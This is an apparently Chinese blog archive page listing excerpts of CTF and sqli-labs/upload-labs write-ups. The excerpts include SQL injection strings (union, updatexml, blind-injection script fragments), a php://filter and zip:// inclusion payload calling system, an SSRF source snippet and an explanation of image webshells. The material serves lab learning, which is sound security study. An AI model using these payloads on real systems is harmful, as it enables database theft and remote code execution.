01 2021 档案

摘要:长春大学上机系统项目分析 技术概要 Java Springboot spring mybatis plus 前端 ​ Element ui ​ markdown ​ jquery ​ css ​ html ​ js 数据库 mysql 安全框架 spring security 文件上传 对象存储os 阅读全文
posted @ 2021-01-26 14:47 PointerK 阅读(49) 评论(0) 推荐(0)
摘要:|| or && and updatexml(0x7e, ,0x7e) 阅读全文
posted @ 2021-01-17 18:54 PointerK 阅读(49) 评论(0) 推荐(0)
摘要:anandd oorr 阅读全文
posted @ 2021-01-17 18:14 PointerK 阅读(46) 评论(0) 推荐(0)
摘要:文章目录 前言 1. 二次注入的原理 1.1 个人理解 1.2 Example 2. 题目分析 2.1 主页 2.2 注册页面 2.3 登录成功界面(修改密码) 3. 注入过程 前言 根据题目 Second Order injections Real treat Stored injections 阅读全文
posted @ 2021-01-17 17:39 PointerK 阅读(96) 评论(0) 推荐(0)
摘要:搭过php相关环境的同学应该对fastcgi不陌生,那么fastcgi究竟是什么东西,为什么nginx可以通过fastcgi来对接php? Fastcgi Record Fastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。 HTTP协议是浏览器和服务器中间件进行数据交换 阅读全文
posted @ 2021-01-16 15:12 PointerK 阅读(171) 评论(0) 推荐(0)
摘要:原来php还有这些 https://www.cnblogs.com/-an-/p/12666933.html#autoid-2-0-0 阅读全文
posted @ 2021-01-15 19:04 PointerK 阅读(53) 评论(0) 推荐(0)
摘要:0x01什么是图片木马? 图片木马在网络上没有统一的定义,在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码(比如一句话木马)的图片文件。 根据定义我们知道图片木马两个条件: 图片能正常显示 包含能执行的而已代码 总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。 常 阅读全文
posted @ 2021-01-15 17:44 PointerK 阅读(758) 评论(0) 推荐(0)
摘要:POST /Pass-02/index.php HTTP/1.1 Host: 192.168.237.131:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 A 阅读全文
posted @ 2021-01-15 11:19 PointerK 阅读(75) 评论(0) 推荐(0)
摘要:upload-lib 开始老是报错 提示:上传错误 很简单 docker 创建后 docker exec -it 7f8a3564c2ea bash 进入处 给 upload 文件夹 777 权限 就ok了 第一题 我上传一句话 ,bp 抓包,没有任何反应直接报错,那就是 本地又上传检查 ok so 阅读全文
posted @ 2021-01-15 10:59 PointerK 阅读(154) 评论(0) 推荐(0)
摘要:文章目录 1. 题目分析 2. 注入思路 3. 注入过程 4. 总结 1. 题目分析 根据题目要求,这一关和最开始的一样,让我们构造一个?id参数到url上,通过改变url的参数获取不同的账户信息。 而当我们尝试输入一个14'的时候,网页给出了报错的信息,'14'' LIMIT 0,1根据这个内容, 阅读全文
posted @ 2021-01-15 08:53 PointerK 阅读(108) 评论(0) 推荐(0)
摘要:YWRtaW4iIGFuZCAxPTIj 阅读全文
posted @ 2021-01-15 08:24 PointerK 阅读(65) 评论(0) 推荐(0)
摘要:如此看来21不是很有营养 https://base64.us/ ok 阅读全文
posted @ 2021-01-15 08:18 PointerK 阅读(68) 评论(0) 推荐(0)
摘要:两张图片自己寻思吧 阅读全文
posted @ 2021-01-14 19:55 PointerK 阅读(49) 评论(0) 推荐(0)
摘要:说是cookie注入。 %3d urldecode = Base64值为0就是A,为27的就是b。这样,每3个字符产生4位的Base64字符。如果被加密的字符串每3个一组,还剩1或2个字符,使用特殊字符"="补齐Base64的4字 https://base64.us/ 在线base64 网站 # e 阅读全文
posted @ 2021-01-14 19:49 PointerK 阅读(110) 评论(0) 推荐(0)
摘要:注入点在cookie 里面 python脚本搞定盲注 # encoding utf-8 # r 1151 e 1079 import requests as req cookie="uname=admin' and 1=1#" header={ "User-Agent":"Mozilla/5.0 ( 阅读全文
posted @ 2021-01-14 13:02 PointerK 阅读(54) 评论(0) 推荐(0)
摘要:漏洞源码 <?php $url=$_GET['url']; $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false); curl_setopt($ch,CURLO 阅读全文
posted @ 2021-01-13 21:56 PointerK 阅读(161) 评论(0) 推荐(0)
摘要:Less-19 有了18题目的经验,这道题就比较简单 直接bp抓包发送 POST /Less-19/ HTTP/1.1 Host: sql.alienwares.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Ge 阅读全文
posted @ 2021-01-13 18:01 PointerK 阅读(67) 评论(1) 推荐(0)
摘要:Less18 个人最终版 1 INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or UPDATEXML(1, (SELECT CONCAT_WS(0x7e,id,username,PAS 阅读全文
posted @ 2021-01-13 16:45 PointerK 阅读(60) 评论(0) 推荐(0)
摘要:show me she shell 这是一道tomato师傅出的不完整的java题,java…,java…我恨java┑( ̄Д  ̄)┍ 这是一个题目一是列目录+任意文件读取, 二是垂直越权+CLRF配SSRF打redis+反序列化命令执行 题目的难度在于代码本身的不完整和java,没办法实际测试,所 阅读全文
posted @ 2021-01-10 23:38 PointerK 阅读(270) 评论(0) 推荐(0)
摘要:原文链接 -http://www.xianxianlabs.com/blog/2020/05/27/355.html 阅读全文
posted @ 2021-01-10 22:08 PointerK 阅读(92) 评论(0) 推荐(0)
摘要:很好的利用了php协议 ?fp=php://filter/convert.base64-encode/resource=home ?fp=zip://uploads/515969bfe90c2f52fbcd7e5818e8688b681eea4e.png%23shell&a=system&b=ls 阅读全文
posted @ 2021-01-10 14:00 PointerK 阅读(830) 评论(0) 推荐(0)
摘要:less-17 基本测试 admin' or 1=1 admin') or 1=1 admin" or 1=1 admin") or 1=1 羞辱的回答 okok 查看源码 <?php //including the Mysql connect parameters. include("../sql 阅读全文
posted @ 2021-01-09 17:14 PointerK 阅读(88) 评论(0) 推荐(0)
摘要:![](https://img2020.cnblogs.com/blog/2051576/202101/2051576-20210109154240393-250317977.png) 阅读全文
posted @ 2021-01-09 15:42 PointerK 阅读(35) 评论(0) 推荐(0)
摘要:脚本可以参考 less-14 阅读全文
posted @ 2021-01-09 15:38 PointerK 阅读(55) 评论(0) 推荐(0)
摘要:测试语句 admin" and 1=1# # right 1493 # error 1454 import requests import time id='"' url="https://sql.alienwares.top/Less-14/" for i in range(1,100): for 阅读全文
posted @ 2021-01-09 15:33 PointerK 阅读(61) 评论(0) 推荐(0)
摘要:and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))='e' #&passwd=admin&submit=Submit# 阅读全文
posted @ 2021-01-09 15:18 PointerK 阅读(45) 评论(0) 推荐(0)
摘要:当请求为admin admin 的时候 就会回显 其它的时候就会回显失败 尝试sql 注入 发现不在有回显sql语句的包裹问题 sql报错的内容 You have an error in your SQL syntax; check the manual that corresponds to yo 阅读全文
posted @ 2021-01-05 16:28 PointerK 阅读(66) 评论(0) 推荐(0)
摘要:测试发现页面回显 注入语句 hackerzcj' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() # 阅读全文
posted @ 2021-01-05 16:05 PointerK 阅读(76) 评论(0) 推荐(0)
摘要:由于自己的不细心 对注入测试的时候 出现了 错误 $id = '"'.$id.'"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; sql 语句接受的参数 拼接 传入的参数 ?id=1 ?id=1' 我都两次注入的结果bp抓吧 发现没有然后差别 阅读全文
posted @ 2021-01-05 14:47 PointerK 阅读(55) 评论(0) 推荐(0)
摘要:判断sql注入的位置和回显的参数 回显界面没有改变,证明sql语句错误不会回显 或者没有sql注入漏洞 python 写脚本请求看返回 import requestsurl= "https://sql.alienwares.top/Less-9/?id=1' and 1=1 %23"res=requ 阅读全文
posted @ 2021-01-05 13:05 PointerK 阅读(65) 评论(0) 推荐(0)
摘要:关于sql注入 sql注入的前要 没有对用户的输入进行过滤,和对sql语句的预编译 select group_concat(table_name) from information_schema.tables where table_schema=database() ?id=-1") union 阅读全文
posted @ 2021-01-04 20:50 PointerK 阅读(101) 评论(0) 推荐(0)